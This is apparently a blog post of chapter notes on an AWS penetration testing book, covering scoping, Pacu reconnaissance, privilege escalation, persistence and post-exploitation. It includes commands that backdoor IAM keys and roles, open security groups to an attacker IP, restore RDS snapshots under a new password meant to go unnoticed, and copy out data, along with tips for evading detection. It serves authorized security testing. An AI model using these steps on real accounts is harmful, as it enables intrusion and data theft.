
Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 19 – Putting it All Together – Real-World AWS Pentesting

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 19 – Putting it All Together – Real-World AWS Pentesting

Last chapter – HOORAY! Basically a walkthrough of what the pentest would look like with tips for doing a good pentest. The walkthrough uses a PersonalUser in an attacker-controlled account with iam:UpdateAssumeRolePolicy and s3:ListBucket permissions and a CompromisedUser in the target account whose permissions are initially unknown.

I’m not going to go in-depth on the how in this blog since previous chapters have covered the exploitation vectors. I’ll be focusing on the process and interesting tidbits provided by the authors. If you’ve gone through the book, all of what’s covered should at least ring a bell.

Make sure to go through a kickoff with the client to cover scope, access, etc. Typical pentest stuff. The scoping part is especially important since an AWS environment doesn't scope the way a typical on-prem environment would. The authors provide a list of questions to help, including the number of AWS accounts involved, access given, services used, regions, number of instances and other resources in use, IAM info, how users access things, etc. Basically, get an idea of the size and composition of the environment you are dealing with.

AWS pentesting rules and guidelines

Really glad to see this section – pentesting cloud services tends to make me nervous because permission isn't as clear. Make sure you aren't breaking the AWS rules for pentesting or the AUP. Realistically, if you are going to be pentesting AWS, you should read through both of these and watch for updates. The authors did point out that the activities AWS prohibits don't cover most of what the book calls pentesting, since most of it is done through the AWS API, which the AUP allows. Potentially some gray area there, but I would expect that a pentesting company would have had legal verify that (meaning that Rhino Security Labs has probably had legal look into it). I'd do my own legal verification though (meaning I would want my company to also verify). Call me paranoid, but I'm not a fan of jail.

Credentials and client expectations

I think we can agree that determining what the client expects is important. And probably making sure that everyone is on the same page so you don’t end up repeating the Coalfire incident that led to arrests and was generally a cluster (through no fault of Coalfire from what I can tell). If the client provides creds, understand what the creds are and if social engineering is allowed. Make sure to find out if you are testing a dev or production environment, anything you shouldn’t touch, and if users are active in the environment. Also find out if there will be a blue team trying to catch you. It’s helpful to provide audit and config checks with the attack narrative, but also keep in mind what the client wants.

Setup

Make sure you have AWS CLI and Pacu ready to go. I’d probably create an AMI so I could have a fresh instance for each test. I’d also have ScoutSuite and the CyberArk tools prepped. Get your AWS keys added, fire up Pacu, and start a new session. If given a set of regions, use set_regions to limit your scope.
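
A minimal version of that setup might look like this (profile and region names are placeholders; the book-era Pacu launches via the script directly):

  aws configure --profile personal-user      # one CLI profile per credential set
  python3 pacu.py                            # name a new session when prompted
  import_keys personal-user                  # inside Pacu: pull the keys in from the CLI profile
  set_regions us-east-1 us-west-2            # only if the client scoped you to specific regions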

Unauthenticated reconnaissance

Other than digging around for open S3 buckets, there’s not a lot you can do completely unauthenticated. So this portion is actually talking about using the PersonalUser to do recon. The first command will come from the CompromisedUser though to get the account ID. Basically, use iam__detect_honeytokens to get the account ID, use swap_keys to switch to the PersonalUser, and use iam__enum_users to look for user info. Use a role from the personal account for the --role-name argument since you need it for one of the API calls. Then use iam__enum_roles to get role info. And review the results to see what you’ve found. The authors walk through the findings in their sample environment and explain what the info could mean.
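
Sketching that flow in the Pacu console (the account ID and role name are placeholders, and the role has to live in your own attacker account):

  run iam__detect_honeytokens                # as CompromisedUser – leaks the target account ID
  swap_keys                                  # switch to PersonalUser
  run iam__enum_users --account-id 123456789012 --role-name MyPacuRole
  run iam__enum_roles --account-id 123456789012 --role-name MyPacuRole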

The last part of the unauthenticated recon uses s3__bucket_finder to look for S3 buckets. Remember to add custom terms to the word list if you have any. The authors note that this module uses the install_dependencies function to pull sub-domain info from Sublist3r and the Buckets.txt file. Interesting aside.
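
I'd double-check the arguments before running it since I'm going from memory here:

  help s3__bucket_finder                     # confirm the flags in your Pacu build
  run s3__bucket_finder -d example.com       # -d <domain> to mutate into candidate bucket names (my recollection)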

Authenticated reconnaissance plus permissions enumeration

Use swap_keys to pull up the CompromisedUser. Run iam__enum_permissions and then whoami to see what privileges you have. Check out any attached policies – note that if an ARN is listed, the policy is AWS-managed. Also look at the list of permissions. While enumerating permissions is important, be aware that it might set off a GuardDuty alert. You can get basic info about permissions for other users and roles with iam__enum_users_roles_policies_groups, but it's better to run iam__enum_permissions against everyone to get the full picture:

 run iam__enum_permissions --all-users --all-roles

This will store the info for manual review or for checking exploitation options with the privilege escalation module. You might also want to run aws__enum_account and aws__enum_spend to get more info. (I might also be using the aws__enum_spend option to keep an eye on costs without logging in to the console because why not?) The spend info can help you determine which services to target, but it won't account for anything on the free tier, isn't live, and some resources don't have an associated cost.
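
Both of those are just run-and-read modules:

  run aws__enum_account
  run aws__enum_spend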

Since EC2 has a high exploitation potential, running ec2__enum next would be a good idea. Scan all the regions or use set_regions to be more targeted. Check the user data returned for each instance with ec2__download_userdata. One of the really nice features of Pacu is it will ask you if you want to run the module(s) necessary to do what you want to do if you haven’t already. The user data may include command history, passwords, etc. Definitely a worthwhile thing to check. You might find additional targets to attack, but remember if there is any question about the target being in scope, check with the client.
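
Roughly (and as noted above, Pacu will offer to run ec2__enum for you if ec2__download_userdata needs data it doesn't have yet):

  run ec2__enum
  run ec2__download_userdata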

Privilege escalation

Now that you’ve enumerated things, you can pass the info to iam__privesc_scan to see if any privilege escalation potential exists. The --offline flag indicates all the things will be checked. Review the output to see what you can find. Take note of interesting findings, and be sure to report anything vulnerable to the client. You can try the potential vulnerabilities with run iam__privesc_scan. The authors walkthrough some exploitation options with info about what they would choose and why. Really good info, so be sure to check that out.

Persistence

So with an EC2 spun up, you have some good access, but it's also something that might stick out and get shut down. Or the associated security groups, etc. could get modified, removing your access. So persistence needs to be established in other ways. Like most pentesting things, the authors recommend multiple persistence methods. Creating new access key pairs was one option (the iam__backdoor_users_keys module used earlier). Another option was using the lambda__backdoor_new_roles module to backdoor IAM roles as they are created so you can assume them from your PersonalUser account.
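
In Pacu terms, hedged since the exact arguments depend on your Pacu version and attacker-account details:

  run iam__backdoor_users_keys               # add a second access key pair to existing users
  run lambda__backdoor_new_roles             # wants your external principal ARN to add to new roles' trust policies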

Post-exploitation

Now it’s time to poke around and see what other issues you can find in the environment. You’ll want to examine as many services as possible because misconfigurations can occur anywhere.

EC2 exploitation

EC2 is a good place to start. Check public IP addresses. You can use CreateLoginProfile to create login creds or the data EC2 command in Pacu to get details. Check security groups to get an idea of what services are running and potential exploitation options. You might be able to do the same with non-public EC2 instances under the right conditions – if you've managed to get full admin access, you probably will. With the right access, you could also just modify security group rules to give yourself access with the AuthorizeSecurityGroupIngress API call or the ec2__backdoor_ec2_sec_groups Pacu module (example below).

There are a couple of options for RCE. The first given was ec2__startup_shell_script – this requires a restart. Nope. Just nope. Maybe if you are desperate and have the go-ahead from the client to knock a server offline for a bit, but generally, nope. systemsmanager__rce_ec2 is another option; it basically gives you root access if the right conditions are met. You could also do some cryptomining if you really want to push the limits. On one hand, I highly doubt this would be an option in the vast majority of pentesting engagements. On the other, I can see a client wanting to test detection capabilities since cryptomining is such a popular attack. Like everything else, have very clear communication with the client and document to what extent you are allowed to disrupt the environment or incur costs. Does this make your pentest a little less realistic? Yes. But breaking things, driving up costs, and otherwise running amok in obvious ways generally are not a great way to get repeat clients. At least not in a production environment.

You might also want to check out EBS volumes. You can snapshot EBS volumes and share them with your account or an EC2 instance in the compromised account. Sharing with your account has some advantages (like being able to dig in and examine it), but it's also more likely to be flagged. Or just use ebs__explore_snapshots in Pacu to check things out. It will iterate through the snapshots, giving you time to explore the EBS volumes before moving on.
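
For the security group route, the raw API call via the CLI looks something like this (group ID and source IP are placeholders; the Pacu module's flags are from memory, so check help first):

  aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 22 --cidr 203.0.113.10/32 --region us-east-1 --profile compromised
  run ec2__backdoor_ec2_sec_groups --ip 203.0.113.10/32 --port-range 1-65535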

Code review and analysis in Lambda

On to Lambda. Start with enumeration using the lambda__enum Pacu module and review the results with data Lambda. Check each function and look closely at the environment variables for sensitive data – be sure to record/screenshot interesting findings to report. If you find something that might be exploitable, go for it if it's in scope. You may also want to download the code for review and exploit any interesting findings (again, if in scope).
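
A rough flow, with TargetFunction as a placeholder name:

  run lambda__enum
  data Lambda
  aws lambda get-function --function-name TargetFunction --profile compromised
  # the Code.Location field in the response is a presigned URL – fetch it to download the deployment package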

Getting past authentication in RDS

RDS can be attacked manually or with Pacu; the goal is to get hold of the databases so you can check the data. The general approach is to snapshot the target instance and restore it to a copy whose master password you control, so you never change (or lose access to) the production credentials. You could then use a tool like mysqldump to pull the data – be sure to review the options available for whatever type of database you are dealing with. If you do this manually, you would need to delete any snapshots and copies you made to avoid running up costs and potentially getting caught (or having a negative impact on the client). Pacu automates this with rds__explore_snapshots, which scans the regions for RDS instances, asks if you want to copy each one, and then cleans up when done. Really handy. And the module buries the password change in a ModifyDBInstance API call that changes a bunch of settings at once, so the new master password won't stand out.
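
If you go the manual route, the dump step is just standard client tooling pointed at your restored copy (endpoint and user are placeholders):

  mysqldump -h restored-copy.abc123xyz.us-east-1.rds.amazonaws.com -u admin -p --all-databases > dump.sql
  run rds__explore_snapshots                 # or let Pacu handle the copy/cleanup loop for you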

The authenticated side of S3

Lots of info available on finding public S3 buckets. For a pentest when you have creds, you can look at things a little differently. Note who has access to what and what information is in those buckets. Review files found strategically to make best use of your time. Consider filenames and extensions as hints to value. Check for creds, API keys, etc. The authors recommend alerting the client to any public resources since those can go from not a problem to problematic with a single file put in the wrong place. The authors also note that the bucket doesn’t have to be publicly listable even if the files need to be public. Check for any automation and use bucket and filenames to assist with recon.
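
The authenticated poking is mostly plain CLI (bucket and key names are placeholders):

  aws s3 ls --profile compromised
  aws s3 ls s3://client-data-bucket --recursive
  aws s3 cp s3://client-data-bucket/backups/prod-config.tar.gz . --profile compromised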

Auditing for compliance and best practices

Providing audit info in addition to the pentest info is helpful. Stuff like public access, encryption, logging, backups, MFA, password policies, etc. The authors recommend using tools to help gather this info. They mention Prowler and Security Monkey in addition to ScoutSuite. Prowler is an AWS CIS benchmark tool that looks interesting – something to test out at least and see how you like the output. Security Monkey monitored AWS and GCP accounts, but it unfortunately hit end-of-life in 2020; the project points you to AWS Config and GCP Cloud Asset Inventory as alternatives. New tools are coming out all the time, so if this is something you need, keep an eye on the landscape.
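
Invocation syntax drifts between versions, but the era-appropriate forms were roughly:

  ./prowler -p compromised -r us-east-1      # Prowler: profile + region
  python scout.py aws --profile compromised  # Scout Suite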

Summary

AWS pentesting is a major undertaking. It’s (like many things in cybersecurity) going to be a never-ending learning process. The authors note it’s hard to be done with an AWS pentest because the environment can be massive and complicated, so do what you can within the timeline. I think this also makes it critical to clearly define scope and be realistic about what you can do within the confines defined. Like most things, people will set up their AWS environment differently so you’ll have to get the lay of the land for each engagement.

So end of the road for this book. Really good book with some pain points that I’ll cover in the book review post.

